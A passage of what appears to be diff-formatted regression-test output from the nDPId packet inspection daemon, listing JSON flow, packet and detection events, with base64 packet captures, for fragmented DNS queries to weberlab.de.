69jYrdbsh11ahmIq4c0voBJAKVJkpfioqYTXkZCppD5DWEnFc7+3dmCZtR6n7cdLRMGXeU0ee7boqf+ntG0ywYMALgABAAAOEACfAAEIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlAAdbeEFbg2lg4i3rnV+6yQt2VeYizGmT\/rDt7rXbe9Gvg0bs7cCzKvh3nLNc7lfkw3Toxu3h2m\/NqvAJNkxLRmrtfxw68cyy4lkHhL2NLL3Y19jvp2qm25mZVgwcJylB9Dlvk0ReqgeiL8E1GyKZ+bYJb4PW+X45ewaJrdYFgGv4wYMALgABAAAOEACfABwIAwAADhBdCiqqXOKPrjDwCHdlYmVyZG5zAmRlALY71RRfBids18YMqfb3pDV95vjCv9gQTwdXg7KIz9hcjsWC4LdX4rCK4Rics7xQ5QaBNODVJNd5alz0R5hMDerxbEpzVvoggNs6EwCYRezdSpP5C3DJFx6i88C2SV16tmoc6mGNeWUyTywezAaRJpoOhH8Av1upKchJBcpyeezmAAApEAAAAIA="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1558968019069,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":14,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.4.10"}} 00209{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":18,"global_ts_msec":1558968019069} 00348{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":1558968019069,"pkt":"AIac51UUAAwpil3XCABFAAAm4hEAuUARm8rBGOPurcKpaAAADwAIAAsAAjgAIAEEcB8LFg=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1558968021013,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968021013,"pkt":"AAwpil3XAIac51UUht1gBi\/8AEMRayoAFFBADAwAAAAAAAAAAQYgAQRwdlsAAAAAAAAKJQBT1J4ANQBDpiukOAAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021013,"flow_last_seen":1558968021013,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968021013,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1558968021014,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":886,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":886,"pkt_l4_len":832,"thread_ts_msec":1558968021014,"pkt":"AIac51UUAAwpil3Xht1gCbz6A0ARQCABBHB2WwAAAAAAAAolAFMqABRQQAwMAAAAAAAAAAEGADXUngNAM\/ikOIQQAAEAAAAEAAEDZmcyCHdlYmVybGFiAmRlAAAcAAHAEAAGAAEAAAA8ADwDbnMwCHdlYmVyZG5zwBkJd2VibWFzdGVyCXdlYmVybmV0egNuZXQAeFhI6QAADhAAAAOEACTqAAAAADzAEAAuAAEAAAA8AR8ABgoCAAAAPF0SKiBc6o8QkEcId2ViZXJsYWICZGUAsAsLORY9T68251zcXXrXYMubapdXlnVZdczSZ8VjQS3g0dStlbXNUxRf4FJCpZevgIdkz+OzavU4Y3EyCKf5qxw7GiEllt+hznji85+jlwbqxa7BHuVrNf4YxsbIr0kaSblmtIn8e12vMQAgQIzOeK4VKGey+3rFftx2Cs7v0mw4V0Rd+gTYttfq+PLvGu8vSZibXFxqlj86VVzTwvOCEmjqKNyjon+\/djMG\/LpzWXoT2evp9l8K1VcJU\/8uUY9ZE4WS0WjV4uuPKKqmHeTkethHG1xsLp0jKFQP8kYfYkdlxDBuNu6KhurVxO4RiM92K63vMdmIW\/4VjMYm2cPPQCBWTlI1U0hKRjVHQ1RFQ1RIN0wwRUNLTEoxTkRGNE04S8CHADIAAQAAALQAMgEAABQQM4lV2XYIwLE0ewVnw5K1+BQAQBNLJ89Pbt3WSJZWXFg+eo1pkwAGQAAAAAACwZQALgABAAAAtAEfADIKAwAAALRdChEDXOJ73JBHCHdlYmVybGFiAmRlAFwWgMgEjrA1OcHB+Qo5dWmMix1bJ7WFGsQIkPmTlF\/KVvK6k5dVU4FDCZtKPuPYCkg0XLBOcR\/wguOUuuyBL7cbjUoN0UHJur34eNeWLngpBhaxFTmuqY80vKjed0ttFQ6uVnd2OAmDzRp6YxYtTin4\/XGlVO6lMt+k2mYftwRyr5Ohjp6NH+J8dbjX7gkD3ENGAHspVLSTz4LxrhUH8dsbFK8rT\/kUhlCBvTuJYAxOkSEWqp4vVZ54PXcY61pn5KAT8mJWdw+HLsa\/lUjZNXicEmky99XDlPLcJk7OI3ZM83QYPgYAFE\/lMHbTSiiue2rS4deUwWxFmnQYlhv0FA4AACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968021014,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":14,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968021014,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1558968021026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1558968021026,"pkt":"AAwpil3XAIac51UUCABFAABEdWYAAGwRujZKfS+IwRjj7ufCADUAMBuRFagAEAABAAAAAAABCHdlYmVybGFiAmRlAAAwAAEAACkQAAAAgAAAAA=="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968021026,"flow_last_seen":1558968021026,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1558968021026,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1558968021027,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAXciTwgAEARrMjBGOPuSn0viAA158IGrsPBFaiEEAABAAQAAAABCHdlYmVybGFiAmRlAAAwAAHADAAwAAEAAAA8AQgBAAMKAwEAAdBU3CjxUKw7SeYza7cxyq\/Xg3znVQsMzuF\/UeLaigOubtJHhxhL+m129IxQkTKo8JRIXcKXD+aViztiml8+8BPCXFNPftFpdFCzBRNGHj\/ca1g\/Flck6v5avafB\/hGqbWKY2LEGKb5ktYWGj8JB0mrKGqDZVPyieC0dYVv02iOaOvUhdl7QtgVybR3V6gHlhoG0BxG+GbjUp+NyPClbuMOIwflbVGB5946PyQGQgnGNX2L1MHumOaYC\/D3UnyzQZNMmqj85GwDNPwEeDfLq6wm1BUfx7MwwcEVuO2B0YmUyiPiSfUoGTwm2P1nGNMhlYij3bY9VvyxCqPQnK0s5Tr3ADAAwAAEAAAA8AggBAQMKAwEAAd3v\/e0irXYKOwtYEB3VPe7z99qvi5le9\/y1XXyplp5y\/5xaqrm\/relG8pgx8GsNW2IgviJKAJ6UiU45ERKoH+fz2qf2SUFHFWwkweiWyLZ4EZHhowviCEx94P4OswNKXmdYHe38rlHPa+3OypW9gYfR9lhCKK3neCPq8\/aFFsTTI7dQ+Q2kERWiCMCybl4WOwsBo\/RlnPM4yufMKIlABiM5NWQPNmI6jYzAYpYoyUhd9HnnIIDlNQ89HpXQdFmysMraXYb7qDOoOEiOodttKH0y\/vtJ2SRU05RF4AEumacIUzAi5LL2cMQxC7t7rlDI4X42NRfOLAqGuOeclFjzqz3OdAJWeg\/AAnSbb02AGCkQ370TX1hWveAXt6xpPWOLgHXSLIF\/lz+wl+Dm8ZNWDnn5zEJuEj3xova1g8zmRXJOmqA6VhGqewxF8c+yKeNEOHz4X4\/RLmWHIuEbvboP00Dk5A9bhyZGVsytOJg+NwhFQtvBWLmD82FFtfSt2vmbFFNwAZOnRZWJOG9L7TFcGIm1OEULmohUyFLsBGMXDFOu1k0o6pqm495tsBuMyJNpfdQoPwOkUpsKi6jmNq6vRjvvNiJbcFylTQrqHGTGuOopuUsBbUXj\/nOr4I6j42k6GDIuTyLDkaVrdrxXmGnfNnStdqWmvHXo\/YFwdls9bcT7wAwALgABAAAAPAIfADAKAgAAADxdChURXOJ+MzN7CHdlYmVybGFiAmRlAB+yP4V\/njTX1ZrAUX52Q4ppNzTYQFwUb\/fZ7UyQYLNxrrstLuUEImGhNwZoGn47E0jCxJscYiApT\/lYiL2L1ySUl4RKqHIjPNuYuibs67t5ZabkYsahlYEA\/lOcM3eIQx9pu5Og7p1d2yBSUETOBiGw2mFf2+ESni6Ue4XPXEEYzAhiMRhuYOJAy8gBqoPjkRBcJfWJSQLCsK1uYySkTZfbAzgJeVM0nXd6azgG0BhRE+LeaO6rN3QVHDtfgnwRdZ0mqwEcP9Ixz7o9MUVSKZ24Kp1QfS5nvEHn5PilNALbZYZOO0cQAeV8BhlxVuALLDecEOLC8sY1mx6ozY5\/aRypyHA9HCrJT0qIHJwgtxE7ldoWyzsz32MKgZvCYMZSPOXK\/W3p61FPtD4iT4Id6xXDvyRuALL3waMUMwy3mSjXDHAdpXWaCOMfYx2IzRk4rN5TDQtUohYwaoSbystwDYKnhZGi9jS0G8FObyWhTrKCl7aTkMBaFEejCh0dfD5WJP+MDS\/TR32BG0S+GtGTl4n1Y8wgyP7nkz3\/REcevkIvpJRUImVc8A\/VPTI+9KvBSkoLPA9Za\/IpqUpgDVsKWU5bp0V0TdEryxvtwOnVXXdH0\/hJMgIgWhmZzY2\/UVoRBVGptWsAIhn5sO+UhcjvZ41p3t\/1mWp23BdUACblNtHcw2MALgABAAAAPAEfADAKAgAAADxdChURXOJ+M5BHCHdlYmVybGFiAmRlAHoYKuiyNMNSWsfXwtRR8n\/pKy73at02yEwt1EoWyfptV8sUoxs="} -00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"thread_ts_msec":1558968021027,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00210{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","l4_data_len":230,"global_ts_msec":1558968021027} 00631{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"dns_fragmented.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":264,"pkt_l4_len":0,"thread_ts_msec":1558968021027,"pkt":"AIac51UUAAwpil3XCABFAAD6iTwAuUAR0PHBGOPuSn0viJJWaQ8FS9tIHo+oVjY51cy6+fgiJNB2zCSb2h1J8D40RJyUZYc0lguNGrMzvogBYnbxInuDKD2B8SGaumxsynJulBSZTde74knucmk+7g4DbM0zyfRD0W3RhD3u0NFdji\/0zmiI817VkCE2GpVvuL3F8KDCC+EMYjJlOHqM+STJxPq9ZF8xJcVITkC6EY6CdRmYmQdqvRYWzDXPjGtyu5XT13H1VC8IJisNUehBDr2PeppANUdXFlyqVQ6mARL6UnTBT0xam7DpmuxycO7BOql2rC7KBJb4lykg9AAAKRAAAACAAAAA"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1558968031134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":121,"pkt_l4_len":67,"thread_ts_msec":1558968031134,"pkt":"AAwpil3XAIac51UUht1gCRS7AEMRbCoAFFBAEwwFAAAAAAAAAQ4gAQRwdlsAAAAAAAAKJQBTiIAANQBD+GeeBgAQAAEAAAAAAAEDZmcyCHdlYmVybGFiAmRlAAAcAAEAACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 01581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1558968031134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":886,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":886,"pkt_l4_len":832,"thread_ts_msec":1558968031134,"pkt":"AIac51UUAAwpil3Xht1gAJ7uA0ARQCABBHB2WwAAAAAAAAolAFMqABRQQBMMBQAAAAAAAAEOADWIgANANAyeBoQQAAEAAAAEAAEDZmcyCHdlYmVybGFiAmRlAAAcAAHAEAAGAAEAAAA8ADwDbnMwCHdlYmVyZG5zwBkJd2VibWFzdGVyCXdlYmVybmV0egNuZXQAeFhI6QAADhAAAAOEACTqAAAAADzAEAAuAAEAAAA8AR8ABgoCAAAAPF0SKiBc6o8QkEcId2ViZXJsYWICZGUAsAsLORY9T68251zcXXrXYMubapdXlnVZdczSZ8VjQS3g0dStlbXNUxRf4FJCpZevgIdkz+OzavU4Y3EyCKf5qxw7GiEllt+hznji85+jlwbqxa7BHuVrNf4YxsbIr0kaSblmtIn8e12vMQAgQIzOeK4VKGey+3rFftx2Cs7v0mw4V0Rd+gTYttfq+PLvGu8vSZibXFxqlj86VVzTwvOCEmjqKNyjon+\/djMG\/LpzWXoT2evp9l8K1VcJU\/8uUY9ZE4WS0WjV4uuPKKqmHeTkethHG1xsLp0jKFQP8kYfYkdlxDBuNu6KhurVxO4RiM92K63vMdmIW\/4VjMYm2cPPQCBWTlI1U0hKRjVHQ1RFQ1RIN0wwRUNLTEoxTkRGNE04S8CHADIAAQAAALQAMgEAABQQM4lV2XYIwLE0ewVnw5K1+BQAQBNLJ89Pbt3WSJZWXFg+eo1pkwAGQAAAAAACwZQALgABAAAAtAEfADIKAwAAALRdChEDXOJ73JBHCHdlYmVybGFiAmRlAFwWgMgEjrA1OcHB+Qo5dWmMix1bJ7WFGsQIkPmTlF\/KVvK6k5dVU4FDCZtKPuPYCkg0XLBOcR\/wguOUuuyBL7cbjUoN0UHJur34eNeWLngpBhaxFTmuqY80vKjed0ttFQ6uVnd2OAmDzRp6YxYtTin4\/XGlVO6lMt+k2mYftwRyr5Ohjp6NH+J8dbjX7gkD3ENGAHspVLSTz4LxrhUH8dsbFK8rT\/kUhlCBvTuJYAxOkSEWqp4vVZ54PXcY61pn5KAT8mJWdw+HLsa\/lUjZNXicEmky99XDlPLcJk7OI3ZM83QYPgYAFE\/lMHbTSiiue2rS4deUwWxFmnQYlhv0FA4AACkQAAAAgAAADwAIAAsAAjgAIAEEcB8LFg=="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":200000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"thread_ts_msec":1558968031134,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2.weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":9318,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":7,"total-updates":0,"current-active-flows":7,"total-active-flows":7,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":48,"global_ts_msec":1559042371783} 00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 